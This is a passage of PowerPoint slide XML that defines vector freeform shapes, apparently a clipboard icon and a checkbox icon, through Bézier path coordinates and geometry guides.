                    <a:pt x="178" y="566"/>
                    <a:pt x="178" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="566"/>
                    <a:pt x="178" y="566"/>
                    <a:pt x="178" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="566"/>
                    <a:pt x="178" y="566"/>
                    <a:pt x="179" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="566"/>
                    <a:pt x="179" y="566"/>
                    <a:pt x="179" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="566"/>
                    <a:pt x="179" y="566"/>
                    <a:pt x="179" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="566"/>
                    <a:pt x="179" y="566"/>
                    <a:pt x="179" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="566"/>
                    <a:pt x="179" y="566"/>
                    <a:pt x="180" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="566"/>
                    <a:pt x="180" y="566"/>
                    <a:pt x="180" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="566"/>
                    <a:pt x="180" y="566"/>
                    <a:pt x="180" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="566"/>
                    <a:pt x="180" y="566"/>
                    <a:pt x="180" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="566"/>
                    <a:pt x="180" y="566"/>
                    <a:pt x="181" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="566"/>
                    <a:pt x="181" y="566"/>
                    <a:pt x="181" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="566"/>
                    <a:pt x="181" y="566"/>
                    <a:pt x="181" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="566"/>
                    <a:pt x="181" y="566"/>
                    <a:pt x="181" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="566"/>
                    <a:pt x="181" y="566"/>
                    <a:pt x="182" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="566"/>
                    <a:pt x="182" y="566"/>
                    <a:pt x="182" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="566"/>
                    <a:pt x="182" y="566"/>
                    <a:pt x="182" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="566"/>
                    <a:pt x="182" y="566"/>
                    <a:pt x="182" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="566"/>
                    <a:pt x="182" y="566"/>
                    <a:pt x="183" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="566"/>
                    <a:pt x="183" y="566"/>
                    <a:pt x="183" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="566"/>
                    <a:pt x="183" y="566"/>
                    <a:pt x="183" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="566"/>
                    <a:pt x="183" y="566"/>
                    <a:pt x="183" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="566"/>
                    <a:pt x="183" y="566"/>
                    <a:pt x="183" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="566"/>
                    <a:pt x="184" y="566"/>
                    <a:pt x="184" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="566"/>
                    <a:pt x="184" y="566"/>
                    <a:pt x="184" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="566"/>
                    <a:pt x="184" y="566"/>
                    <a:pt x="184" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="566"/>
                    <a:pt x="184" y="566"/>
                    <a:pt x="184" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="566"/>
                    <a:pt x="185" y="566"/>
                    <a:pt x="185" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="566"/>
                    <a:pt x="185" y="566"/>
                    <a:pt x="185" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="566"/>
                    <a:pt x="185" y="566"/>
                    <a:pt x="185" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="566"/>
                    <a:pt x="185" y="566"/>
                    <a:pt x="185" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                    <a:pt x="186" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="566"/>
                    <a:pt x="187" y="566"/>
                    <a:pt x="187" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="566"/>
                    <a:pt x="187" y="566"/>
                    <a:pt x="187" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="566"/>
                    <a:pt x="190" y="565"/>
                    <a:pt x="191" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="565"/>
                    <a:pt x="191" y="565"/>
                    <a:pt x="191" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="565"/>
                    <a:pt x="192" y="565"/>
                    <a:pt x="192" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="565"/>
                    <a:pt x="192" y="565"/>
                    <a:pt x="192" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="565"/>
                    <a:pt x="192" y="565"/>
                    <a:pt x="192" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="565"/>
                    <a:pt x="192" y="565"/>
                    <a:pt x="192" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="565"/>
                    <a:pt x="193" y="565"/>
                    <a:pt x="193" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="565"/>
                    <a:pt x="193" y="565"/>
                    <a:pt x="193" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="565"/>
                    <a:pt x="193" y="565"/>
                    <a:pt x="193" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="565"/>
                    <a:pt x="193" y="565"/>
                    <a:pt x="193" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="565"/>
                    <a:pt x="194" y="565"/>
                    <a:pt x="194" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="565"/>
                    <a:pt x="194" y="565"/>
                    <a:pt x="194" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="565"/>
                    <a:pt x="194" y="565"/>
                    <a:pt x="194" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="565"/>
                    <a:pt x="194" y="565"/>
                    <a:pt x="194" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="565"/>
                    <a:pt x="194" y="565"/>
                    <a:pt x="195" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="565"/>
                    <a:pt x="195" y="565"/>
                    <a:pt x="195" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="565"/>
                    <a:pt x="195" y="565"/>
                    <a:pt x="195" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="565"/>
                    <a:pt x="195" y="565"/>
                    <a:pt x="195" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="565"/>
                    <a:pt x="195" y="565"/>
                    <a:pt x="196" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="565"/>
                    <a:pt x="196" y="565"/>
                    <a:pt x="196" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="565"/>
                    <a:pt x="196" y="565"/>
                    <a:pt x="196" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="565"/>
                    <a:pt x="196" y="565"/>
                    <a:pt x="196" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="565"/>
                    <a:pt x="196" y="565"/>
                    <a:pt x="197" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="565"/>
                    <a:pt x="197" y="565"/>
                    <a:pt x="197" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="565"/>
                    <a:pt x="197" y="565"/>
                    <a:pt x="197" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="565"/>
                    <a:pt x="197" y="565"/>
                    <a:pt x="197" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="565"/>
                    <a:pt x="197" y="565"/>
                    <a:pt x="198" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="565"/>
                    <a:pt x="198" y="565"/>
                    <a:pt x="198" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="565"/>
                    <a:pt x="198" y="565"/>
                    <a:pt x="198" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="564"/>
                    <a:pt x="198" y="564"/>
                    <a:pt x="198" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="564"/>
                    <a:pt x="198" y="564"/>
                    <a:pt x="198" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="564"/>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                    <a:pt x="199" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="544"/>
                    <a:pt x="465" y="420"/>
                    <a:pt x="472" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="193"/>
                    <a:pt x="330" y="126"/>
                    <a:pt x="311" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="98"/>
                    <a:pt x="292" y="88"/>
                    <a:pt x="278" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="87"/>
                    <a:pt x="263" y="89"/>
                    <a:pt x="254" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="70"/>
                    <a:pt x="235" y="60"/>
                    <a:pt x="225" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="41"/>
                    <a:pt x="206" y="31"/>
                    <a:pt x="196" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="10"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="156" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="77498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84" name="Freeform 147">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E27B69-0EC7-3B4B-AE88-DFD1D35C95EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3463925" y="2546350"/>
              <a:ext cx="523875" cy="792163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 274 w 305"/>
                <a:gd name="T1" fmla="*/ 88 h 462"/>
                <a:gd name="T2" fmla="*/ 238 w 305"/>
                <a:gd name="T3" fmla="*/ 88 h 462"/>
                <a:gd name="T4" fmla="*/ 238 w 305"/>
                <a:gd name="T5" fmla="*/ 85 h 462"/>
                <a:gd name="T6" fmla="*/ 224 w 305"/>
                <a:gd name="T7" fmla="*/ 71 h 462"/>
                <a:gd name="T8" fmla="*/ 182 w 305"/>
                <a:gd name="T9" fmla="*/ 71 h 462"/>
                <a:gd name="T10" fmla="*/ 194 w 305"/>
                <a:gd name="T11" fmla="*/ 42 h 462"/>
                <a:gd name="T12" fmla="*/ 152 w 305"/>
                <a:gd name="T13" fmla="*/ 0 h 462"/>
                <a:gd name="T14" fmla="*/ 110 w 305"/>
                <a:gd name="T15" fmla="*/ 42 h 462"/>
                <a:gd name="T16" fmla="*/ 122 w 305"/>
                <a:gd name="T17" fmla="*/ 71 h 462"/>
                <a:gd name="T18" fmla="*/ 80 w 305"/>
                <a:gd name="T19" fmla="*/ 71 h 462"/>
                <a:gd name="T20" fmla="*/ 64 w 305"/>
                <a:gd name="T21" fmla="*/ 85 h 462"/>
                <a:gd name="T22" fmla="*/ 64 w 305"/>
                <a:gd name="T23" fmla="*/ 88 h 462"/>
                <a:gd name="T24" fmla="*/ 32 w 305"/>
                <a:gd name="T25" fmla="*/ 88 h 462"/>
                <a:gd name="T26" fmla="*/ 0 w 305"/>
                <a:gd name="T27" fmla="*/ 119 h 462"/>
                <a:gd name="T28" fmla="*/ 0 w 305"/>
                <a:gd name="T29" fmla="*/ 430 h 462"/>
                <a:gd name="T30" fmla="*/ 32 w 305"/>
                <a:gd name="T31" fmla="*/ 462 h 462"/>
                <a:gd name="T32" fmla="*/ 274 w 305"/>
                <a:gd name="T33" fmla="*/ 462 h 462"/>
                <a:gd name="T34" fmla="*/ 305 w 305"/>
                <a:gd name="T35" fmla="*/ 430 h 462"/>
                <a:gd name="T36" fmla="*/ 305 w 305"/>
                <a:gd name="T37" fmla="*/ 119 h 462"/>
                <a:gd name="T38" fmla="*/ 274 w 305"/>
                <a:gd name="T39" fmla="*/ 88 h 462"/>
                <a:gd name="T40" fmla="*/ 152 w 305"/>
                <a:gd name="T41" fmla="*/ 25 h 462"/>
                <a:gd name="T42" fmla="*/ 169 w 305"/>
                <a:gd name="T43" fmla="*/ 42 h 462"/>
                <a:gd name="T44" fmla="*/ 152 w 305"/>
                <a:gd name="T45" fmla="*/ 59 h 462"/>
                <a:gd name="T46" fmla="*/ 136 w 305"/>
                <a:gd name="T47" fmla="*/ 42 h 462"/>
                <a:gd name="T48" fmla="*/ 152 w 305"/>
                <a:gd name="T49" fmla="*/ 25 h 462"/>
                <a:gd name="T50" fmla="*/ 267 w 305"/>
                <a:gd name="T51" fmla="*/ 424 h 462"/>
                <a:gd name="T52" fmla="*/ 38 w 305"/>
                <a:gd name="T53" fmla="*/ 424 h 462"/>
                <a:gd name="T54" fmla="*/ 38 w 305"/>
                <a:gd name="T55" fmla="*/ 126 h 462"/>
                <a:gd name="T56" fmla="*/ 64 w 305"/>
                <a:gd name="T57" fmla="*/ 126 h 462"/>
                <a:gd name="T58" fmla="*/ 64 w 305"/>
                <a:gd name="T59" fmla="*/ 128 h 462"/>
                <a:gd name="T60" fmla="*/ 80 w 305"/>
                <a:gd name="T61" fmla="*/ 140 h 462"/>
                <a:gd name="T62" fmla="*/ 224 w 305"/>
                <a:gd name="T63" fmla="*/ 140 h 462"/>
                <a:gd name="T64" fmla="*/ 238 w 305"/>
                <a:gd name="T65" fmla="*/ 128 h 462"/>
                <a:gd name="T66" fmla="*/ 238 w 305"/>
                <a:gd name="T67" fmla="*/ 126 h 462"/>
                <a:gd name="T68" fmla="*/ 267 w 305"/>
                <a:gd name="T69" fmla="*/ 126 h 462"/>
                <a:gd name="T70" fmla="*/ 267 w 305"/>
                <a:gd name="T71" fmla="*/ 424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462">
                  <a:moveTo>
                    <a:pt x="274" y="88"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="88"/>
                    <a:pt x="238" y="88"/>
                    <a:pt x="238" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="85"/>
                    <a:pt x="238" y="85"/>
                    <a:pt x="238" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="78"/>
                    <a:pt x="232" y="71"/>
                    <a:pt x="224" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="71"/>
                    <a:pt x="182" y="71"/>
                    <a:pt x="182" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="62"/>
                    <a:pt x="194" y="53"/>
                    <a:pt x="194" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="18"/>
                    <a:pt x="176" y="0"/>
                    <a:pt x="152" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="0"/>
                    <a:pt x="110" y="18"/>
                    <a:pt x="110" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="53"/>
                    <a:pt x="115" y="62"/>
                    <a:pt x="122" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="71"/>
                    <a:pt x="80" y="71"/>
                    <a:pt x="80" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="71"/>
                    <a:pt x="64" y="78"/>
                    <a:pt x="64" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="88"/>
                    <a:pt x="64" y="88"/>
                    <a:pt x="64" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="88"/>
                    <a:pt x="32" y="88"/>
                    <a:pt x="32" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="88"/>
                    <a:pt x="0" y="101"/>
                    <a:pt x="0" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="430"/>
                    <a:pt x="0" y="430"/>
                    <a:pt x="0" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="448"/>
                    <a:pt x="15" y="462"/>
                    <a:pt x="32" y="462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="462"/>
                    <a:pt x="274" y="462"/>
                    <a:pt x="274" y="462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="462"/>
                    <a:pt x="305" y="448"/>
                    <a:pt x="305" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="119"/>
                    <a:pt x="305" y="119"/>
                    <a:pt x="305" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="101"/>
                    <a:pt x="291" y="88"/>
                    <a:pt x="274" y="88"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="25"/>
                    <a:pt x="169" y="33"/>
                    <a:pt x="169" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="51"/>
                    <a:pt x="162" y="59"/>
                    <a:pt x="152" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="59"/>
                    <a:pt x="136" y="51"/>
                    <a:pt x="136" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="33"/>
                    <a:pt x="143" y="25"/>
                    <a:pt x="152" y="25"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="267" y="424"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="424"/>
                    <a:pt x="38" y="424"/>
                    <a:pt x="38" y="424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="126"/>
                    <a:pt x="38" y="126"/>
                    <a:pt x="38" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="126"/>
                    <a:pt x="64" y="126"/>
                    <a:pt x="64" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="128"/>
                    <a:pt x="64" y="128"/>
                    <a:pt x="64" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="135"/>
                    <a:pt x="73" y="140"/>
                    <a:pt x="80" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="140"/>
                    <a:pt x="224" y="140"/>
                    <a:pt x="224" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="140"/>
                    <a:pt x="238" y="135"/>
                    <a:pt x="238" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="126"/>
                    <a:pt x="238" y="126"/>
                    <a:pt x="238" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267" y="126"/>
                    <a:pt x="267" y="126"/>
                    <a:pt x="267" y="126"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="267" y="42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85" name="Freeform 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EB3F03A-081D-704E-AD35-5085BEC421D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3584575" y="2841625"/>
              <a:ext cx="93663" cy="93663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 55"/>
                <a:gd name="T1" fmla="*/ 55 h 55"/>
                <a:gd name="T2" fmla="*/ 50 w 55"/>
                <a:gd name="T3" fmla="*/ 55 h 55"/>
                <a:gd name="T4" fmla="*/ 55 w 55"/>
                <a:gd name="T5" fmla="*/ 50 h 55"/>
                <a:gd name="T6" fmla="*/ 55 w 55"/>
                <a:gd name="T7" fmla="*/ 24 h 55"/>
                <a:gd name="T8" fmla="*/ 46 w 55"/>
                <a:gd name="T9" fmla="*/ 35 h 55"/>
                <a:gd name="T10" fmla="*/ 46 w 55"/>
                <a:gd name="T11" fmla="*/ 47 h 55"/>
                <a:gd name="T12" fmla="*/ 36 w 55"/>
                <a:gd name="T13" fmla="*/ 47 h 55"/>
                <a:gd name="T14" fmla="*/ 31 w 55"/>
                <a:gd name="T15" fmla="*/ 47 h 55"/>
                <a:gd name="T16" fmla="*/ 31 w 55"/>
                <a:gd name="T17" fmla="*/ 47 h 55"/>
                <a:gd name="T18" fmla="*/ 27 w 55"/>
                <a:gd name="T19" fmla="*/ 47 h 55"/>
                <a:gd name="T20" fmla="*/ 12 w 55"/>
                <a:gd name="T21" fmla="*/ 47 h 55"/>
                <a:gd name="T22" fmla="*/ 12 w 55"/>
                <a:gd name="T23" fmla="*/ 26 h 55"/>
                <a:gd name="T24" fmla="*/ 11 w 55"/>
                <a:gd name="T25" fmla="*/ 25 h 55"/>
                <a:gd name="T26" fmla="*/ 12 w 55"/>
                <a:gd name="T27" fmla="*/ 25 h 55"/>
                <a:gd name="T28" fmla="*/ 12 w 55"/>
                <a:gd name="T29" fmla="*/ 12 h 55"/>
                <a:gd name="T30" fmla="*/ 43 w 55"/>
                <a:gd name="T31" fmla="*/ 12 h 55"/>
                <a:gd name="T32" fmla="*/ 52 w 55"/>
                <a:gd name="T33" fmla="*/ 1 h 55"/>
                <a:gd name="T34" fmla="*/ 50 w 55"/>
                <a:gd name="T35" fmla="*/ 0 h 55"/>
                <a:gd name="T36" fmla="*/ 5 w 55"/>
                <a:gd name="T37" fmla="*/ 0 h 55"/>
                <a:gd name="T38" fmla="*/ 0 w 55"/>
                <a:gd name="T39" fmla="*/ 5 h 55"/>
                <a:gd name="T40" fmla="*/ 0 w 55"/>
                <a:gd name="T41" fmla="*/ 50 h 55"/>
                <a:gd name="T42" fmla="*/ 5 w 55"/>
                <a:gd name="T43"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55">
                  <a:moveTo>
                    <a:pt x="5" y="55"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="55"/>
                    <a:pt x="50" y="55"/>
                    <a:pt x="50" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="55"/>
                    <a:pt x="55" y="53"/>
                    <a:pt x="55" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="24"/>
                    <a:pt x="55" y="24"/>
                    <a:pt x="55" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="35"/>
                    <a:pt x="46" y="35"/>
                    <a:pt x="46" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="47"/>
                    <a:pt x="46" y="47"/>
                    <a:pt x="46" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="47"/>
                    <a:pt x="36" y="47"/>
                    <a:pt x="36" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="47"/>
                    <a:pt x="33" y="47"/>
                    <a:pt x="31" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="47"/>
                    <a:pt x="31" y="47"/>
                    <a:pt x="31" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="47"/>
                    <a:pt x="28" y="47"/>
                    <a:pt x="27" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="47"/>
                    <a:pt x="12" y="47"/>
                    <a:pt x="12" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="26"/>
                    <a:pt x="12" y="26"/>
                    <a:pt x="12" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="25"/>
                    <a:pt x="11" y="25"/>
                    <a:pt x="11" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="25"/>
                    <a:pt x="12" y="25"/>
                    <a:pt x="12" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="12"/>
                    <a:pt x="12" y="12"/>
                    <a:pt x="12" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="12"/>
                    <a:pt x="43" y="12"/>
                    <a:pt x="43" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="1"/>
                    <a:pt x="52" y="1"/>
                    <a:pt x="52" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="1"/>
                    <a:pt x="51" y="0"/>
                    <a:pt x="50" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="5" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="50"/>
